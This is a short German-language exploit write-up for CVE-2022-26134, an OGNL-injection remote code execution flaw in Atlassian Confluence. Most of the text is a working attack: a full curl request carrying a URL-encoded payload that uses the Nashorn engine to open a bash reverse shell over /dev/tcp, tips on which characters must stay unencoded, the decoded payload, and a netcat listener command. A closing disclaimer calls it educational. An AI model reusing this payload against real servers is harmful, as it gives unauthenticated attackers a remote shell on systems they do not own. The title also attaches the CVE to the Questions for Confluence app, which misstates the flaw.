
Aktive Ausnutzung der Atlassian Questions for Confluence App CVE-2022-26134
CVE-2022-26134 ist eine kritische Remote Code Execution (RCE)-Sicherheitslücke, die Atlassian Confluence betrifft. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, durch das Einschleusen von OGNL-Ausdrücken in angreifbare Endpunkte beliebigen Code auszuführen.
Der folgende CURL-Befehl demonstriert die aktive Ausnutzung dieser Sicherheitslücke unter Verwendung der Java-Nashorn-Engine zur Ausführung einer Reverse Shell:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
Bei diesen Änderungen müssen wir auch die URL-Kodierung berücksichtigen. Der Payload-String im Proof-of-Concept ist nicht vollständig URL-kodiert. Bestimmte Zeichen (insbesondere ".", "-" und "/") sind nicht kodiert. Obwohl das nicht immer der Fall ist, erweist sich dies für diesen Exploit als wichtig für die Funktionsfähigkeit des Payloads. Wenn eines dieser Zeichen kodiert wird, parst der Server die URL anders und der Payload könnte nicht ausgeführt werden. Das bedeutet, dass wir nach einer Modifikation keine URL-Kodierung auf den gesamten Payload anwenden können.
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
Diese Dokumentation dient ausschließlich zu Bildungszwecken. Die unbefugte Ausnutzung von Systemen ist illegal und kann schwerwiegende Konsequenzen haben. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Sicherheitsbewertungen durchführen.